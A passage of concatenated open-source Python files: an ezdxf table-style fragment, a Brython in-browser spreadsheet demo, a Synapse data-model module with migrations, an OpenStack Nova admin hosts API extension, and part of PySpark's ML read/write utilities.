# 0/1 = not suppressed/suppressed
"suppress_column_header": DXFAttr(281),
# The following group codes are repeated for every cell in the table
# 7: Text style name (string; default = STANDARD)
# 140: Text height (real)
# 170: Cell alignment (integer)
# 62: Text color (integer; default = BYBLOCK)
# 63: Cell fill color (integer; default = 7)
# 283: Flag for whether background color is enabled (default = 0):
# 0/1 = disabled/enabled
# 90: Cell data type
# 91: Cell unit type
# 274-279: Lineweight associated with each border type of the cell
# (default = kLnWtByBlock)
# 284-289: Flag for visibility associated with each border type of the cell
# (default = 1): 0/1 = Invisible/Visible
# 64-69: Color value associated with each border type of the cell
# (default = BYBLOCK)
},
)
# todo: implement TABLESTYLE
class TableStyle(DXFObject):
"""DXF TABLESTYLE entity
Every ACAD_TABLE has its own table style.
Requires DXF version AC1021/R2007
"""
DXFTYPE = "TABLESTYLE"
DXFATTRIBS = DXFAttributes(base_class, acdb_table_style)
MIN_DXF_VERSION_FOR_EXPORT = const.DXF2007
class TableStyleManager(ObjectCollection):
def __init__(self, doc: "Drawing"):
super().__init__(
doc, dict_name="ACAD_TABLESTYLE", object_type="TABLESTYLE"
)
|
|
from browser import document, html, alert, local_storage
import json
import ui
storage = local_storage.storage
current_cell = None
current_cell_info = None
def entry_keydown(ev):
global current_cell
_input = ev.target
cell = _input.parent
is_arrow = ev.keyCode in [9, #tab
37, # left
39, # right
38, #up
40, #down
13 # CR
]
if is_arrow:
update(cell)
current_cell = None
move_sel(ev)
#document.bind('keydown', doc_keydown)
elif ev.keyCode == 27: # escape
update_current(cell.info['entry'])
cell.remove(_input)
cell.text = cell.value
current_cell = None
#document.bind('keydown', doc_keydown)
ev.stopPropagation()
def entry_keyup(ev):
update_current(current_cell.get(selector='INPUT')[0].value)
def update_current(data):
document['current'].value = data
def entry_click(ev):
ev.stopPropagation()
# callbacks for cell editor
def enter_editor(ev):
make_input(selected)
ev.target.focus()
current_cell.get(selector='INPUT')[0].value = ev.target.value
ev.stopPropagation()
def editor_keydown(ev):
ev.stopPropagation()
def update_from_editor(ev):
global current_cell
current_cell.get(selector='INPUT')[0].value = ev.target.value
if ev.keyCode == 13: # CR
update(current_cell)
current_cell = None
ev.target.blur()
elif ev.keyCode == 27: # escape
update_current(current_cell.info['entry'])
current_cell.clear()
current_cell.text = current_cell.value
current_cell = None
ev.target.blur()
ev.stopPropagation()
selected = None
def update(cell):
# update the table, based on the last entry in specified cell
content = cell.get(selector='INPUT')[0].value
cell.info['entry'] = content
if content.startswith('='):
cell.text = eval(content[1:])
else:
cell.text = content
def doc_keydown(ev):
is_arrow = ev.keyCode in [9, #tab
37, # left
39, # right
38, #up
40, #down
13 # CR
]
if is_arrow:
move_sel(ev)
elif ev.keyCode != 0:
make_input(selected)
def move_sel(ev):
cell = selected
row = cell.parent
cell_num = row.children.index(cell)
row_num = row.parent.children.index(row)
# jump to next cell
if ev.keyCode==39 or (ev.keyCode==9 and not ev.shiftKey) or ev.keyCode==13:
if cell_num<len(row.children)-1:
next_cell = row.children[cell_num+1]
mark_selected(next_cell)
elif ev.keyCode==37 or (ev.keyCode==9 and ev.shiftKey):
if cell_num>1:
next_cell = row.children[cell_num-1]
mark_selected(next_cell)
elif ev.keyCode == 40:
if row_num<len(row.parent.children)-1:
next_cell = row.parent.children[row_num+1].children[cell_num]
mark_selected(next_cell)
elif ev.keyCode == 38:
if row_num>1:
next_cell = row.parent.children[row_num-1].children[cell_num]
mark_selected(next_cell)
ev.preventDefault()
ev.stopPropagation()
def select(ev):
global current_cell
if current_cell is not None:
update(current_cell)
current_cell = None
mark_selected(ev.target)
def mark_selected(cell):
global selected
if selected is not None:
selected.style.borderColor = '#000'
selected.style.borderWidth = '1px'
cell.style.borderColor = 'blue'
cell.style.borderWidth = '2px'
selected = cell
update_current(cell.info['entry'])
def deselect():
global selected
if selected is not None:
selected.style.borderColor = '#000'
selected.style.borderWidth = '1px'
selected = None
def entry(ev):
make_input(ev.target, True)
def make_input(cell, keep_value=False):
global current_cell
if current_cell is not None:
value = current_cell.get(selector='INPUT')[0].value
current_cell.clear()
current_cell.text = value
value = cell.text.strip()
# save value in case editing the cell is aborted by Escape
cell.value = cell.text
cell.clear()
_input = html.INPUT(style={'padding':'0px'})
if keep_value:
_input.value = cell.info['entry']
_input.style.width = '%spx' %100
cell <= _input
_input.bind('keydown', entry_keydown)
_input.bind('keyup', entry_keyup)
_input.bind('click', entry_click)
document['current'].value = cell.info['entry']
_input.focus()
current_cell = cell
mark_selected(cell)
# Functions to open/save spredsheets
prefix = 'brython_spreadsheet'
def sheet_names():
return [ name[len(prefix):] for name in storage.keys()
if name.startswith(prefix)]
def select_sheet(ev):
names = sheet_names()
names.sort()
if names:
d = ui.Dialog("Open sheet...")
d.add_ok_cancel(ok=open_sheet)
d.body <= html.SPAN('File', style=dict(marginRight='10px'))
d.body <= html.SELECT(html.OPTION(name) for name in names)
else:
d = ui.Dialog("Error")
d.body <= "No sheet found"
document <= d
def open_sheet(dialog):
select = dialog.get(selector='select')[0]
print(select)
dialog.close()
sheet_name = select.options[select.selectedIndex].value
data = json.loads(storage['brython_spreadsheet%s' %sheet_name])
print(data)
document['panel'].clear()
load(sheet_name)
cells = []
for row in document['sheet_table'].get(selector='TR')[1:]:
cells.append([])
for cell in row.get(selector='TD'):
cells[-1].append(cell)
for row, column, entry in data:
cell = cells[row][column]
cell.info = {'entry':entry}
if not entry.startswith('='):
cell.text = entry
else:
cell.text = eval(entry[1:])
def save_as(ev):
d = ui.Dialog("Save sheet as...")
d.add_ok_cancel(ok=save_sheet, cancel=cancel_save_as)
d.body <= html.SPAN('File name', style=dict(marginRight='10px'))
d.body <= html.INPUT()
document.unbind('keydown')
document <= d
def cancel_save_as(dialog):
document.bind('keydown', doc_keydown)
dialog.close()
def confirm_override(widget):
save_sheet_content(widget.sheet_name)
def save_sheet(dialog):
document.bind('keydown', doc_keydown)
sheet_name = dialog.get(selector='input')[0].value
if not sheet_name.strip():
d = ui.dialog.Dialog()
d.set_title("Error")
d.set_body("No sheet name provided")
return
if sheet_name in sheet_names():
d = ui.dialog.YesNoDialog("Save sheet",
"A sheet named %s already exists. Override ?" %sheet_name,
confirm_override,
None)
d.sheet_name = sheet_name
return
save_sheet_content(sheet_name)
def save_sheet_content(sheet_name):
info = []
table = document['sheet_table']
for i,row in enumerate(table.get(selector="TR")[1:]):
print(row)
for j, cell in enumerate(row.get(selector='TD')):
if cell.info['entry']:
info.append([i, j, cell.info['entry']])
storage['brython_spreadsheet%s' %sheet_name] = json.dumps(info)
document['sheet_name'].text = sheet_name
current_menu = None
def stop_menu(*args):
global current_menu
if current_menu:
current_menu.close()
current_menu = None
document.bind('keydown', doc_keydown)
document.bind('click', stop_menu)
menu_file = None
def load(sheet_name=None):
global current_cell_info,menu_file
if sheet_name is None:
sheet_name = 'New document'
panel = document['panel']
title = html.DIV(style=dict(width='auto'))
title <= html.H2(sheet_name, id="sheet_name")
panel <= title
menu = ui.Menu()
menu_file = menu.add('File')
menu_file.add('New', None)
menu_file.add('Open...', select_sheet)
menu_file.add('Save as...', save_as)
panel <= html.SPAN(menu)
panel <= html.BR()
cell_editor = html.INPUT(style=dict(width="200px"), Id="current")
cell_editor.bind('click', enter_editor)
cell_editor.bind('keydown', editor_keydown)
cell_editor.bind('keyup', update_from_editor)
panel <= cell_editor
t = html.TABLE(Id="sheet_table")
srow = -1
rows, cols = 20, 20
col_widths = [100 for i in range(rows)]
line = html.TR()
line <= html.TH()
for i in range(cols):
col_name = chr(65+i)
line <= html.TH(col_name, style={'min-width':'%spx' %col_widths[i]})
t <= line
for i in range(rows*cols):
row, column = divmod(i, cols)
if row>srow:
line = html.TR()
line <= html.TH(row+1)
t <= line
srow = row
cell = html.TD('',id='c%s_%s' %(row,column),style=dict(padding='2px'))
cell.bind('click', select)
cell.bind('dblclick', entry)
cell.info = {'entry':''}
line <= cell
panel <= html.DIV(t,style=dict(float='left'))
mark_selected(t.get(selector='TD')[0])
load()
|
|
import logging
import synapse.common as s_common
import synapse.lib.tufo as s_tufo
import synapse.lib.module as s_module
logger = logging.getLogger(__name__)
class SynMod(s_module.CoreModule):
@staticmethod
def getBaseModels():
modl = {
'types': (
('syn:splice', {'subof': 'guid'}),
('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),
('syn:alias', {'subof': 'str', 'regex': r'^\$[a-z_]+$',
'doc': 'A synapse guid alias', 'ex': '$visi'}),
('syn:ingest', {'subof': 'str:lwr'}),
('syn:log', {'subof': 'guid'}),
),
'forms': (
('syn:splice', {'local': 1}, (
('act', {'ptype': 'str:lwr'}),
('time', {'ptype': 'time'}),
('node', {'ptype': 'guid'}),
('user', {'ptype': 'str:lwr'}),
('tag', {'ptype': 'str:lwr'}),
('form', {'ptype': 'str:lwr'}),
('valu', {'ptype': 'str:lwr'}),
)),
('syn:alias', {'local': 1}, (
('iden', {'ptype': 'guid', 'defval': '*',
'doc': 'The GUID for the given alias name'}),
)),
('syn:trigger', {'ptype': 'guid', 'local': 1}, (
('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),
('on', {'ptype': 'syn:perm'}),
('run', {'ptype': 'syn:storm'}),
('user', {'ptype': 'str'}),
)),
('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),
('syn:form', {'doc': 'The base form type.'}, (
('doc', {'ptype': 'str', 'doc': 'basic form definition'}),
('ver', {'ptype': 'int', 'doc': 'form version within the model'}),
('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),
('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),
('local', {'ptype': 'bool', 'defval': 0,
'doc': 'Flag used to determine if a form should not be included in splices'}),
)),
('syn:prop', {'doc': 'The base property type.'}, (
('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),
('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),
('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),
('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),
('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form teh node.'}),
('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),
('base', {'ptype': 'str', 'doc': 'Base name of the property'}),
('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),
('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),
('univ', {'ptype': 'bool',
'doc': 'Specifies if a prop is universal and has no form associated with it.'}),
)),
('syn:type', {'doc': 'The base type type.'}, (
('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),
('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),
('*', {'glob': 1})
)),
('syn:tag', {'doc': 'The base form for a synapse tag.'}, (
('up', {'ptype': 'syn:tag', 'doc': ''}),
('doc', {'ptype': 'str', 'defval': '', }),
('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),
('title', {'ptype': 'str', 'doc': '', 'defval': ''}),
('base', {'ptype': 'str', 'doc': '', 'ro': 1}),
)),
('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (
('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),
('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies too', 'ro': 1}),
('doc', {'ptype': 'str:txt', 'defval': '??',
'doc': 'The long form description for what the tag means on the given node form'}),
('title', {'ptype': 'str:txt', 'defval': '??',
'doc': 'The short name for what the tag means the given node form'}),
)),
('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms with in the model'}, (
('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),
('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by teh types/forms in the model'}),
)),
('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (
('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),
('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),
)),
('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (
('time', {'ptype': 'time'}),
('text', {'ptype': 'json'})
)),
('syn:log', {'ptype': 'guid', 'local': 1}, (
('subsys', {'ptype': 'str', 'defval': '??',
'doc': 'Named subsystem which originaed teh log event'}),
('level', {'ptype': 'int', 'defval': logging.WARNING, }),
('time', {'ptype': 'time', 'doc': 'When the log event occured'}),
('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),
('info:*', {'glob': 1})
)),
)
}
name = 'syn'
return ((name, modl),)
@s_module.modelrev('syn', 201709051630)
def _delOldModelNodes(self):
types = self.core.getRowsByProp('syn:type')
forms = self.core.getRowsByProp('syn:form')
props = self.core.getRowsByProp('syn:prop')
syncore = self.core.getRowsByProp('.:modl:vers:syn:core')
with self.core.getCoreXact():
[self.core.delRowsById(r[0]) for r in types]
[self.core.delRowsById(r[0]) for r in forms]
[self.core.delRowsById(r[0]) for r in props]
[self.core.delRowsById(r[0]) for r in syncore]
@s_module.modelrev('syn', 201709191412)
def _revModl201709191412(self):
'''
Migrate the XREF types to use the propvalu syntax.
'''
tick = s_common.now()
adds = []
dels = set()
nforms = set()
for form in self.core.getModelDict().get('forms'):
sforms = self.core.getTypeOfs(form)
if 'xref' in sforms:
nforms.add(form)
for ntyp in nforms:
nodes = self.core.getTufosByProp(ntyp)
xtyp = '{}:xtype'.format(ntyp)
xrefp = '{}:xref'.format(ntyp)
xrefpint = '{}:xref:intval'.format(ntyp)
xrefpstr = '{}:xref:strval'.format(ntyp)
xrefprop = '{}:xref:prop'.format(ntyp)
for node in nodes:
iden = node[0]
srcvtype = node[1].get(xtyp)
if srcvtype is None:
# This is expensive node level introspection :(
for prop, valu in s_tufo.props(node).items():
if prop.startswith('xref:'):
form = prop.split('xref:', 1)[1]
if self.core.isTufoForm(form):
srcvtype = form
break
if not srcvtype:
raise s_common.NoSuchProp(iden=node[0], type=ntyp,
mesg='Unable to find a xref prop which is a form for migrating a '
'XREF node.')
srcprp = '{}:xref:{}'.format(ntyp, srcvtype)
srcv = node[1].get(srcprp)
valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])
adds.append((iden, xrefp, valu, tick))
adds.append((iden, xrefprop, srcvtype, tick))
if 'intval' in subs:
adds.append((iden, xrefpint, subs.get('intval'), tick))
else:
adds.append((iden, xrefpstr, subs.get('strval'), tick))
dels.add(srcprp)
dels.add(xtyp)
with self.core.getCoreXact():
self.core.addRows(adds)
for prop in dels:
self.core.delRowsByProp(prop)
@s_module.modelrev('syn', 201710191144)
def _revModl201710191144(self):
with self.core.getCoreXact():
now = s_common.now()
adds = []
logger.debug('Lifting tufo:form rows')
for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):
adds.append((i, 'node:created', t, now),)
logger.debug('Deleting existing node:created rows')
self.core.store.delRowsByProp('node:created')
if adds:
tot = len(adds)
logger.debug('Adding {:,d} node:created rows'.format(tot))
i = 0
n = 100000
for chunk in s_common.chunks(adds, n):
self.core.store.addRows(chunk)
i = i + len(chunk)
logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))
logger.debug('Finished adding node:created rows to the Cortex')
@s_module.modelrev('syn', 201711012123)
def _revModl201711012123(self):
now = s_common.now()
forms = sorted(self.core.getTufoForms())
nforms = len(forms)
for n, form in enumerate(forms):
adds = []
logger.debug('Computing node:ndef rows for [{}]'.format(form))
for i, p, v, t in self.core.store.getRowsByProp(form):
# This is quicker than going through the norm process
nv = s_common.guid((p, v))
adds.append((i, 'node:ndef', nv, now))
if adds:
tot = len(adds)
logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))
with self.core.getCoreXact() as xact:
i = 0
nt = 100000
for chunk in s_common.chunks(adds, nt):
self.core.store.addRows(chunk)
i = i + len(chunk)
logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))
logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))
logger.debug('Finished adding node:ndef rows to the Cortex')
|
|
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
def index(self, req):
"""Returns a dict in the format:
| {'hosts': [{'host_name': 'some.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.other.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.celly.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'console1.host.com',
| 'service': 'consoleauth',
| 'zone': 'internal'},
| {'host_name': 'network1.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'netwwork2.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'compute1.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'compute2.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'sched1.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'sched2.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'vol1.host.com',
| 'service': 'volume',
| 'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks
nova_context.require_admin_context(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
for service in services:
if service.binary not in api_services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
def update(self, req, id, body):
"""Updates a specified body.
:param body: example format {'status': 'enable',
'maintenance_mode': 'enable'}
"""
def read_enabled(orig_val, msg):
"""Checks a specified orig_val and returns True for 'enabled'
and False for 'disabled'.
:param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
# See what the user wants to 'update'
params = {k.strip().lower(): v for k, v in six.iteritems(body)}
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % list(
params.keys())[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id, maint_mode)
return result
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host
"""
if enabled:
LOG.info(_LI("Enabling host %s."), host_name)
else:
LOG.info(_LI("Disabling host %s."), host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": host_name, "power_action": result}
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node.vcpus,
'memory_mb': compute_node.memory_mb,
'disk_gb': compute_node.local_gb}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node.vcpus_used,
'memory_mb': compute_node.memory_mb_used,
'disk_gb': compute_node.local_gb_used}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
# NOTE(eliqiao): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
host_name = id
try:
compute_node = (
objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host_name))
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in six.itervalues(by_proj_resources):
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
"""Admin-only host administration."""
name = "Hosts"
alias = "os-hosts"
namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
updated = "2011-06-29T00:00:00Z"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
collection_actions={'update': 'PUT'},
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import sys
import os
import time
import uuid
import warnings
if sys.version > '3':
basestring = str
unicode = str
long = int
from pyspark import SparkContext, since
from pyspark.ml.common import inherit_doc
from pyspark.sql import SparkSession
def _jvm():
"""
Returns the JVM view associated with SparkContext. Must be called
after SparkContext is initialized.
"""
jvm = SparkContext._jvm
if jvm:
return jvm
else:
raise AttributeError("Cannot load _jvm from SparkContext. Is SparkContext initialized?")
class Identifiable(object):
"""
Object with a unique ID.
"""
def __init__(self):
#: A unique id for the object.
self.uid = self._randomUID()
def __repr__(self):
return self.uid
@classmethod
def _randomUID(cls):
"""
Generate a unique unicode id for the object. The default implementation
concatenates the class name, "_", and 12 random hex chars.
"""
return unicode(cls.__name__ + "_" + uuid.uuid4().hex[12:])
@inherit_doc
class BaseReadWrite(object):
"""
Base class for MLWriter and MLReader. Stores information about the SparkContext
and SparkSession.
.. versionadded:: 2.3.0
"""
def __init__(self):
self._sparkSession = None
def context(self, sqlContext):
"""
Sets the Spark SQLContext to use for saving/loading.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
raise NotImplementedError("Read/Write is not yet implemented for type: %s" % type(self))
def session(self, sparkSession):
"""
Sets the Spark Session to use for saving/loading.
"""
self._sparkSession = sparkSession
return self
@property
def sparkSession(self):
"""
Returns the user-specified Spark Session or the default.
"""
if self._sparkSession is None:
self._sparkSession = SparkSession.builder.getOrCreate()
return self._sparkSession
@property
def sc(self):
"""
Returns the underlying `SparkContext`.
"""
return self.sparkSession.sparkContext
@inherit_doc
class MLWriter(BaseReadWrite):
"""
Utility class that can save ML instances.
.. versionadded:: 2.0.0
"""
def __init__(self):
super(MLWriter, self).__init__()
self.shouldOverwrite = False
def _handleOverwrite(self, path):
from pyspark.ml.wrapper import JavaWrapper
_java_obj = JavaWrapper._new_java_obj("org.apache.spark.ml.util.FileSystemOverwrite")
wrapper = JavaWrapper(_java_obj)
wrapper._call_java("handleOverwrite", path, True, self.sc._jsc.sc())
def save(self, path):
"""Save the ML instance to the input path."""
if self.shouldOverwrite:
self._handleOverwrite(path)
self.saveImpl(path)
def saveImpl(self, path):
"""
save() handles overwriting and then calls this method. Subclasses should override this
method to implement the actual saving of the instance.
"""
raise NotImplementedError("MLWriter is not yet implemented for type: %s" % type(self))
def overwrite(self):
"""Overwrites if the output path already exists."""
self.shouldOverwrite = True
return self
@inherit_doc
class JavaMLWriter(MLWriter):
"""
(Private) Specialization of :py:class:`MLWriter` for :py:class:`JavaParams` types
"""
def __init__(self, instance):
super(JavaMLWriter, self).__init__()
_java_obj = instance._to_java()
self._jwrite = _java_obj.write()
def save(self, path):
"""Save the ML instance to the input path."""
if not isinstance(path, basestring):
raise TypeError("path should be a basestring, got type %s" % type(path))
self._jwrite.save(path)
def overwrite(self):
"""Overwrites if the output path already exists."""
self._jwrite.overwrite()
return self
def context(self, sqlContext):
"""
Sets the SQL context to use for saving.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
warnings.warn(
"Deprecated in 2.1 and will be removed in 3.0, use session instead.",
DeprecationWarning)
self._jwrite.context(sqlContext._ssql_ctx)
return self
def session(self, sparkSession):
"""Sets the Spark Session to use for saving."""
self._jwrite.session(sparkSession._jsparkSession)
return self
@inherit_doc
class MLWritable(object):
"""
Mixin for ML instances that provide :py:class:`MLWriter`.
.. versionadded:: 2.0.0
"""
def write(self):
"""Returns an MLWriter instance for this ML instance."""
raise NotImplementedError("MLWritable is not yet implemented for type: %r" % type(self))
def save(self, path):
"""Save this ML instance to the given path, a shortcut of 'write().save(path)'."""
self.write().save(path)
@inherit_doc
class JavaMLWritable(MLWritable):
"""
(Private) Mixin for ML instances that provide :py:class:`JavaMLWriter`.
"""
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@inherit_doc
class MLReader(BaseReadWrite):
"""
Utility class that can load ML instances.
.. versionadded:: 2.0.0
"""
def __init__(self):
super(MLReader, self).__init__()
def load(self, path):
"""Load the ML instance from the input path."""
raise NotImplementedError("MLReader is not yet implemented for type: %s" % type(self))
@inherit_doc
